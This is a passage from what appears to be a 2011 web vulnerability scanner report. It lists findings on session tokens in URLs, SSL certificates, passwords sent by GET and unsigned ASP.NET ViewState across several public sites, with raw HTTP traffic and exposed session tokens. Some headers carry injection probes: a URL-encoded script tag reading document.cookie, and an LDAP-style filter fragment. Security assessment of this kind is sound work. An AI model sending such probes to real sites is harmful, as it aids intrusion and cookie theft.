</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AC599A1662228CD6303621FA2C4E0BCC9EB6A4EF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F8C9C9AFA9C19FFB67AD57626A0687F47E8E5240&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3073CD54A8A1A9D1D6783B890466B8D1B3D33DC6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955"
>
Report abuse</a>
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_1935182374/187-0383633-5130955?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.19. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=10150138890205613&app_id=10150138890205613&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1b163a75%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df9d5fb794%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Dfe7ffb01c%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df13f2287ec%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.redacted%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df166fcfba8%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f13f2287ec&origin=http%3A%2F%2Fphotoblog.msnbc.redacted%2Ffc5f7798&relation=parent&transport=postmessage&frame=f9d5fb794
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:19:40 GMT
Content-Length: 0


11.20. http://www.redacted/scp/AuthServiceTwitter.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.redacted
Path:   /scp/AuthServiceTwitter.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 220

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&amp;lang=en">here</a>.</h
...[SNIP]...

11.21. http://www.thespacereview.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.thespacereview.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: text/html
Content-Length: 24875

<html>
<head>
<title>The Space Review: essays and commentary about the final frontier</title>
<link rel="stylesheet" type="text/css" href="/includes/style.css">
</head>

<body bgcolor="#ffffff" topmar
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=d0yKxSl" charset="utf-8"></script>
...[SNIP]...

12. SSL certificate
There are 8 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



12.1. https://signup.live.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://signup.live.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  signup.live.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Thu Oct 21 12:07:36 CDT 2010
Valid to:  Sat Oct 20 12:07:36 CDT 2012

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.2. https://www.msnfeedback.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.msnfeedback.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  CN=www.msnfeedback.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Jan 04 17:50:10 CST 2011
Valid to:  Thu Jan 03 17:50:10 CST 2013

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed Apr 09 16:37:54 CDT 2008
Valid to:  Sat Feb 19 12:24:53 CST 2011

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Tue Feb 19 12:27:02 CST 2008
Valid to:  Sat Feb 19 12:24:53 CST 2011

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.3. https://www.newsvine.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.newsvine.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Thu Jun 24 16:45:01 CDT 2010
Valid to:  Fri Jun 24 16:45:01 CDT 2011

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #4

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.4. https://secure.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.scout.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Sep 30 19:00:00 CDT 2010
Valid to:  Mon Oct 10 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.5. https://secure.shared.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shared.live.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.shared.live.com,ST=Washington
Issued by:  Akamai Subordinate CA 3
Valid from:  Wed Jul 07 14:00:54 CDT 2010
Valid to:  Thu Jul 07 14:00:54 CDT 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.6. https://secure.wlxrs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.wlxrs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.wlxrs.com,ST=Washington
Issued by:  Akamai Subordinate CA 3
Valid from:  Tue Jan 25 07:41:40 CST 2011
Valid to:  Wed Jan 25 07:41:40 CST 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.7. https://security.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  security.live.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed May 05 19:00:00 CDT 2010
Valid to:  Fri May 06 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.8. https://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  twitter.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Jul 26 19:00:00 CDT 2010
Valid to:  Wed Jul 27 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


13.1. http://digg.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

13.2. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
</h3>
       <form id="login" action="http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

13.3. http://www.scientificamerican.com/errors/404.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /errors/404.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
</h3>
       <form id="login" action="https://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

14. ASP.NET ViewState without MAC enabled
There are 24 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


14.1. http://beta-ads.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://beta-ads.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 02:06:03 GMT
Content-Length: 1402
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.2. http://college.scout.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://college.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.3. http://content.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.scout.com
Path:   /a.z

Request

GET /a.z HTTP/1.1
Host: content.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

